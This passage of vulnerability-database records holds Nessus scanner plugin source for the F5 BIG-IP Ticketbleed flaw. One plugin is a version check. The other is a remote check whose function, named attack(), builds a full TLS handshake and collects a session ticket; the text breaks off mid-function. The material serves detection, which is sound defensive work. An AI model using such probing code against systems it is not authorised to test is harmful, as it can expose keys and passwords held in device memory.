(CVE-2016-9244)", "edition": 38, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-02-10T00:00:00", "title": "F5 Networks BIG-IP : F5 TLS vulnerability (K05121675) (Ticketbleed)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9244"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL05121675.NASL", "href": "https://www.tenable.com/plugins/nessus/97091", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K05121675.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97091);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/01/04 10:03:40\");\n\n script_cve_id(\"CVE-2016-9244\");\n\n script_name(english:\"F5 Networks BIG-IP : F5 TLS vulnerability (K05121675) (Ticketbleed)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A BIG-IP SSL virtual server with the non-default Session Tickets\noption enabled may leak up to 31 bytes of uninitialized memory, aka\nthe Ticketbleed bug. 
(CVE-2016-9244)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K05121675\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K05121675.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/08\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K05121675\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = 
make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\",\"11.2.1\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"12.0.0-12.1.2\",\"11.4.0-11.6.1\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.0.0\",\"12.1.2HF1\",\"11.6.1HF2\",\"11.5.4HF3\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_warning(port:0, extra:bigip_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-02-04T10:01:48", "description": "Based on its response to a resumed TLS connection, the remote\nservice appears to be affected by an information disclosure\nvulnerability, known as Ticketbleed, in the TLS Session Ticket\nimplementation. The issue is due to the server incorrectly echoing\nback 32 bytes of memory, even if the Session ID was shorter. 
A remote\nattacker can exploit this vulnerability, by providing a 1-byte Session\nID, to disclose up to 31 bytes of uninitialized memory which may\ncontain sensitive information such as private keys, passwords, and\nother sensitive data.\n\nNote that this vulnerability is only exploitable if the non-default\nSession Tickets option is enabled.", "edition": 15, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "published": "2017-02-15T00:00:00", "title": "F5 TLS Session Ticket Implementation Remote Memory Disclosure (Ticketbleed) (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9244"], "modified": "2017-02-15T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_analytics", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_SESSION_ID_MEM_DISCLOSURE.NASL", "href": "https://www.tenable.com/plugins/nessus/97191", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(97191);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/03\");\n\n script_cve_id(\"CVE-2016-9244\");\n script_xref(name:\"EDB-ID\", value:\"41298\");\n\n script_name(english:\"F5 TLS Session Ticket Implementation Remote Memory Disclosure (Ticketbleed) (uncredentialed check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is affected by an information disclosure\nvulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"Based on its response to a resumed TLS connection, the remote\nservice appears to be affected by an information disclosure\nvulnerability, known as Ticketbeed, in the TLS Session Ticket\nimplementation. The issue is due to the server incorrectly echoing\nback 32 bytes of memory, even if the Session ID was shorter. A remote\nattacker can exploit this vulnerability, by providing a 1-byte Session\nID, to disclose up to 31 bytes of uninitialized memory which may\ncontain sensitive information such as private keys, passwords, and\nother sensitive data.\n\nNote that this vulnerability is only exploitable if the non-default\nSession Tickets option enabled.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://filippo.io/Ticketbleed/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blog.filippo.io/finding-ticketbleed/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.f5.com/csp/article/K05121675\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to a fixed version according to the vendor advisory\n(K05121675). 
Alternatively, disable the Session Ticket option on the\naffected Client SSL profile.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9244\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/02/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/02/15\");\n\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_analytics\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"General\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssl_supported_versions.nasl\",\"bigip_web_detect.nasl\");\n script_require_keys(\"installed_sw/F5 BIG-IP web management\");\n script_require_ports(\"SSL/Supported\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('x509_func.inc');\ninclude('rsync.inc');\ninclude('ftp_func.inc');\ninclude('ldap_func.inc');\ninclude('nntp_func.inc');\ninclude('smtp_func.inc');\ninclude('telnet2_func.inc');\ninclude('ssl_funcs.inc');\ninclude('http.inc');\ninclude('install_func.inc');\n\napp = 'F5 BIG-IP web management';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\n##\n# Checks whether a cipher is in a list of cipher suites.\n#\n# @anonparam cipher Cipher in question.\n# @anonparam ciphers List of cipher suites.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_cipher_in_list()\n{\n local_var cipher, ciphers, i, id, len;\n\n cipher = _FCT_ANON_ARGS[0];\n ciphers = _FCT_ANON_ARGS[1];\n\n len = strlen(ciphers);\n for (i = 0; i < len; i += 2)\n {\n id = substr(ciphers, i, i + 2 - 1);\n if (cipher == id) return TRUE;\n }\n\n return FALSE;\n}\n\n##\n# Pad the data for AES\n# Assumes AES, so a blocksize of 16 is assumed\n##\nfunction tls_pad(data)\n{\n local_var padlen;\n # Pad the message\n padlen = 16 - ((strlen(data) + 1) % 16);\n if (padlen == 0)\n padlen = 15;\n return data + crap(data:mkbyte(padlen), length:padlen + 1);\n}\n\n##\n# Computes the MAC of the data.\n#\n# @param client Whether the data is from the client or server.\n# @param data The data to calculate the MAC of.\n# @param type The type of the record.\n#\n# @returns The MAC 
of the given data, in protocol-specific form.\n##\nfunction tls_mac(key, seq, data, type, cipher_desc, version)\n{\n local_var hmac;\n\n cipher_desc = cipher_field(name:cipher_desc, field:\"mac\");\n # Encode the client sequence number.\n seq = mkdword(0) + mkdword(seq);\n\n if ('SHA512' >< cipher_desc)\n hmac = @HMAC_SHA512;\n\n if ('SHA384' >< cipher_desc && defined_func(\"HMAC_SHA384\"))\n hmac = @HMAC_SHA384;\n\n if ('SHA256' >< cipher_desc)\n hmac = @HMAC_SHA256;\n\n if ('SHA224' >< cipher_desc)\n hmac = @HMAC_SHA224;\n\n if ('SHA1' >< cipher_desc)\n hmac = @HMAC_SHA1;\n\n if ('MD5' >< cipher_desc)\n hmac = @HMAC_MD5;\n\n if (isnull(hmac))\n return NULL;\n\n return hmac(\n key:key,\n data:seq + tls_mk_record(type:type, data:data, version:version)\n );\n}\n\n##\n# Split the key block into IVs, cipher keys, and MAC keys.\n#\n# @anonparam keyblk Key block derived from the master secret.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction tls_set_keys(cipher_desc, keyblk)\n{\n local_var mac_size, iv_size, key_size, pos, tls;\n local_var mac, encryption;\n\n # Determine the size of the key block's fields.\n mac = cipher_field(name:cipher_desc, field:\"mac\");\n if ('SHA1' >< mac) mac_size = 20;\n else if ('SHA256' >< mac) mac_size = 32;\n else return FALSE;\n\n encryption = cipher_field(name:cipher_desc, field:\"encrypt\");\n if ('AES-CBC(128)' >< encryption) { key_size = 16; iv_size = 16; }\n else if ('AES-CBC(256)' >< encryption) { key_size = 32; iv_size = 16; }\n else return FALSE;\n\n # Ensure the block is big enough.\n if (strlen(keyblk) < 2 * (mac_size + key_size + iv_size))\n return FALSE;\n\n # Extract the data from the key block.\n pos = 0;\n tls['enc_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n tls['dec_mac_key'] = substr(keyblk, pos, pos + mac_size - 1); pos += mac_size;\n tls['enc_key'] = substr(keyblk, pos, pos + key_size - 1); pos += key_size;\n tls['dec_key'] = substr(keyblk, pos, pos + key_size - 1); pos += 
key_size;\n tls['enc_iv'] = substr(keyblk, pos, pos + iv_size - 1); pos += iv_size;\n tls['dec_iv'] = substr(keyblk, pos, pos + iv_size - 1);\n\n return tls;\n}\n\n##\n##\n# Tries to make a TLS connection to the server.\n#\n# @return TRUE for success, FALSE otherwise.\n##\nfunction attack(port, ciphers)\n{\n local_var soc, data, rec, srv_random, clt_random, version, cipher_desc;\n local_var cert, clt_cert_requested, skex, premaster, n, e, dh_privkey;\n local_var ckex, keyblk, tls_keys, tls_ciphertext, handshake_transcript, master_secret;\n local_var finished, session_ticket, srv_change_cipher_spec_received;\n local_var session_id;\n\n # Get a socket to perform a handshake.\n soc = open_sock_ssl(port);\n if (!soc)\n return [FALSE, \"open_sock_ssl\", \"Couldn't open TCP or STARTTLS socket to service.\"];\n\n data = client_hello(\n v2hello:FALSE,\n version:mkword(TLS_10), # Record-layer version (RFC5246 Appendix E)\n maxver:mkword(TLS_12), # Handshake version; maximum we support\n cipherspec:ciphers,\n extensions:tls_ext(type:35, data:\"\") # Session Tickets supported\n );\n send(socket:soc, data:data);\n rec = ssl_parse(blob:data);\n # Hang onto the Client Random; we need it to derive keys later.\n clt_random = mkdword(rec['time']) + rec['random'];\n\n # Begin collecting bodies of handshake messages (without record layer)\n handshake_transcript = substr(data, 5, strlen(data) - 1);\n\n # Read records one at a time. 
Expect to see at a minimum:\n # ServerHello, Certificate, and ServerHelloDone.\n while (TRUE)\n {\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"recv_ssl\", \"Did not receive expected messages from server in reply to ClientHello.\"];\n }\n\n # Continue collecting bodies of handshake messages (stripping off\n # record-layer header)\n if (!isnull(ssl_find(blob:data, 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE)))\n handshake_transcript += substr(data, 5, strlen(data) - 1);\n\n # ServerHello: Extract the random data for computation of keys.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO\n );\n\n if (!isnull(rec))\n {\n if (rec['extension_session_ticket'] != TRUE)\n return [FALSE, \"ticket_support\", \"Server does not support TLS Session Tickets.\"];\n\n # If server asks for version less than TLS 1.0 or higher than TLS 1.2, fail.\n if (rec['handshake_version'] < TLS_10 || rec['handshake_version'] > TLS_12)\n return [FALSE, \"handshake_version\", \"Server does not support TLS 1.0, 1.1, or 1.2.\"];\n\n # Use the TLS version the server wants\n version = rec['handshake_version'];\n\n srv_random = mkdword(rec['time']) + rec['random'];\n\n # Wacko SSL servers might return a cipher suite not in the\n # client's request list.\n if (!tls_cipher_in_list(mkword(rec['cipher_spec']), ciphers))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Server ignored our list of supported ciphers.\"];\n }\n\n # Store the negotiated cipher suite.\n cipher_desc = ciphers_desc[cipher_name(id:rec['cipher_spec'])];\n\n if (isnull(cipher_desc))\n {\n close(soc);\n return [FALSE, \"cipher_spec\", \"Assertion failure.\"];\n }\n }\n\n # Certificate: Extract the server's public key.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE\n );\n\n if (!isnull(rec) && 
max_index(rec['certificates']) > 0)\n {\n # First cert in the chain should be the server cert.\n cert = parse_der_cert(cert:rec['certificates'][0]);\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"parse_der_cert\", \"Failed to parse server's certificate.\"];\n }\n cert = cert['tbsCertificate'];\n }\n\n # Server Key Exchange.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_KEY_EXCHANGE\n );\n\n if (!isnull(rec['data']))\n skex = ssl_parse_srv_kex(blob:rec['data'], cipher:cipher_desc, version:version);\n\n # Certificate Request.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_CERTIFICATE_REQUEST\n );\n\n if (!isnull(rec['data']))\n clt_cert_requested = TRUE;\n\n # Server Hello Done.\n rec = ssl_find(\n blob:data,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_SERVER_HELLO_DONE\n );\n\n # When we get a ServerHelloDone, it's our turn to send again.\n if (!isnull(rec))\n break;\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n\n if (!isnull(rec))\n {\n close(soc);\n return [FALSE, \"handshake_failure\", \"Server sent alert to ClientHello. Level: \" + rec['level'] + \", description: \" + rec['description']];\n }\n }\n\n # Will contain an empty ClientCertificate (if requested), ClientKeyExchange,\n data = '';\n\n # Create an empty client certificate if one is requested.\n if (clt_cert_requested)\n {\n # Send an empty certificate for now. 
TLSv1.0 says the client can\n # send an empty certificate.\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type : SSL3_HANDSHAKE_TYPE_CERTIFICATE,\n data : ssl_vldata_put(data:NULL,len:3)\n )\n );\n handshake_transcript += substr(data, 5, strlen(data) - 1);\n }\n\n # Process ServerCertificate and ServerKeyExchange messages.\n var kex_desc = cipher_field(name:cipher_desc, field:\"kex\");\n if (kex_desc =~ \"RSA($|\\()\")\n {\n if (isnull(cert))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Server selected RSA key exchange but didn't provide a certificate.\"];\n }\n\n if (isnull(cert['subjectPublicKeyInfo']) || isnull(cert['subjectPublicKeyInfo'][1]))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"A server certificate with an unsupported algorithm was found.\"];\n }\n\n n = cert['subjectPublicKeyInfo'][1][0];\n e = cert['subjectPublicKeyInfo'][1][1];\n\n if (isnull(n) || isnull(e))\n {\n close(soc);\n return [FALSE, \"rsa_kx\", \"Failed to extract public key from server certificate.\"];\n }\n\n premaster = mkword(TLS_12) + rand_str(length:46);\n\n # Encrypt the premaster secret with server's RSA public key.\n ckex = rsa_public_encrypt(data:premaster, n:n, e:e);\n\n # It looks like TLS 1.0 and up prepend a two-byte length, but the\n # RFC is vague.\n if (version >= TLS_10)\n ckex = ssl_vldata_put(data:ckex, len:2);\n }\n else if (kex_desc =~ \"DH($|\\()\")\n {\n if (isnull(skex))\n {\n close(soc);\n return [FALSE, \"dh_kx\", \"Server selected DH key exchange but didn't provide a ServerKeyExchange.\"];\n }\n\n # Generate the client private key,\n dh_privkey = rand_str(length:16);\n\n # Compute the premaster secret.\n premaster = bn_mod_exp(skex['dh_y'], dh_privkey, skex['dh_p']);\n\n # Encode the client's DH public key\n ckex = ssl_vldata_put(\n data:bn_mod_exp(skex['dh_g'], dh_privkey, skex['dh_p']),\n len:2\n );\n }\n else\n {\n close(soc);\n return [FALSE, \"kx\", \"Unsupported key exchange 
method.\"];\n }\n\n # Create a ClientKeyExchange record\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n version:version,\n data:ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_CLIENT_KEY_EXCHANGE,\n data:ckex\n )\n );\n handshake_transcript += substr(data, 5, strlen(data) - 1);\n\n master_secret = ssl_calc_master(\n c_random:clt_random,\n s_random:srv_random,\n version:version,\n premaster:premaster,\n cipher_desc:cipher_desc\n );\n\n # For troubleshooting problems, when a PCAP is provided by a customer\n # and we need to see the encrypted Finished message or alert messages.\n set_kb_item(\n name:\"nss_keylog/\" + SCRIPT_NAME,\n value:\"CLIENT_RANDOM \" + hexstr(clt_random) + \" \" + hexstr(master_secret)\n );\n\n tls_keys = tls_set_keys(\n cipher_desc:cipher_desc,\n keyblk:ssl_derive_keyblk(\n c_random:clt_random,\n s_random:srv_random,\n version:version,\n master:master_secret,\n cipher_desc:cipher_desc\n )\n );\n\n if (tls_keys == FALSE)\n {\n close(soc);\n return [FALSE, \"kx\", \"Failed to make TLS keys from key exchange.\"];\n }\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_CHANGECIPHERSPEC,\n data:mkbyte(1),\n version:version\n );\n\n finished = ssl_mk_handshake_msg(\n type:SSL3_HANDSHAKE_TYPE_FINISHED,\n data:ssl_calc_finished(\n master:master_secret,\n handshake:handshake_transcript,\n is_client:TRUE,\n version:version,\n cipher_desc:cipher_desc\n )\n );\n handshake_transcript += finished;\n\n # MAC the finished message\n finished += tls_mac(key:tls_keys['enc_mac_key'], seq:0, version:version, type:SSL3_CONTENT_TYPE_HANDSHAKE, cipher_desc:cipher_desc, data:finished);\n\n # Use a random IV, as it's included explicitly in TLS 1.1\n if (version >= TLS_11)\n tls_keys['enc_iv'] = rand_str(length:strlen(tls_keys['enc_iv']));\n\n finished = tls_pad(data:finished);\n\n # Encrypt the finished message\n tls_ciphertext = aes_cbc_encrypt(\n data:finished,\n iv:tls_keys['enc_iv'],\n key:tls_keys['enc_key']\n );\n\n # TLS 1.1+ explicitly includes 
the IV in each record\n if (version >= TLS_11)\n {\n tls_ciphertext = tls_keys['enc_iv'] + tls_ciphertext[0];\n }\n # In TLS 1.0 we don't include the IV in the record, and we do have\n # to hang onto the CBC residue for the next record.\n else\n {\n tls_keys['enc_iv'] = tls_ciphertext[1];\n tls_ciphertext = tls_ciphertext[0];\n }\n\n data += tls_mk_record(\n type:SSL3_CONTENT_TYPE_HANDSHAKE,\n data:tls_ciphertext,\n version:version\n );\n\n # Send the ChangeCipherSpec and the Finished message\n send(socket:soc, data:data);\n\n while (TRUE)\n {\n # Receive a record from the server.\n data = recv_ssl(socket:soc);\n if (isnull(data))\n {\n close(soc);\n return [FALSE, \"after_ckex\", \"Server did not send all expected messages in its last flight of handshakes.\"];\n }\n\n # Is it an alert?\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_ALERT\n );\n if (!isnull(rec))\n {\n close(soc);\n if (clt_cert_requested)\n return [FALSE, \"after_ckex\", \"Server sent an alert to our ClientKeyExchange (and a client certificate was requested).\"];\n else\n return [FALSE, \"after_ckex\", \"Server sent an alert to our ClientKeyExchange.\"];\n }\n\n # Keep collecting handshake bodies, only for not-encrypted handshake bodies\n if (ssl_find(blob:data, encrypted:FALSE, 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE))\n handshake_transcript += substr(data, 5, strlen(data) - 1);\n\n # The session ticket\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_HANDSHAKE,\n 'handshake_type', SSL3_HANDSHAKE_TYPE_NEW_SESSION_TICKET\n );\n if (!isnull(rec))\n session_ticket = rec['ticket'];\n\n rec = ssl_find(\n blob:data,\n encrypted:FALSE,\n 'content_type', SSL3_CONTENT_TYPE_CHANGECIPHERSPEC\n );\n if (!isnull(rec))\n srv_change_cipher_spec_received = TRUE;\n\n # Looking for the encrypted Finished message\n # When we get it we're done receiving and we're ready to close\n # the connection with a close_notify alert\n rec = 
